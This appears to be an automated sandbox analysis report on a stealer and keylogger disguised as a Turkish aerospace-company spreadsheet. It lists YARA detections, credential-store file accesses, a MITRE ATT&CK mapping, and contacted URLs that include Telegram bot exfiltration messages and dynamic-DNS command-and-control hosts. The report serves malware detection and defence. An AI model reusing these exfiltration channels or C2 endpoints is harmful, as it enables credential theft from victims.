Source: Yara match	File source: 00000000.00000002.2182151240.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 5728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3379471851.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 5728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3764638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3764638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3542808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.32d2e7c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2183125606.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2186688831.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2226842794.000000000342A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2182151240.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 5728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	36%	Virustotal		Browse
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	39%	ReversingLabs	Win32.Trojan.Leonem
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	39%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	36%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:48:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:18:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003207000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000003.00000002.2193534020.0000000004DE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2193534020.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/DataSet1.xsd	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr	false	high
https://contoso.com/License	powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003233000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003202000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031D6000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003207000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031C7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.mi	powershell.exe, 00000003.00000002.2204333625.0000000006F60000.00000004.00000020.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3399202891.0000000006880000.00000004.00000020.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2193534020.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
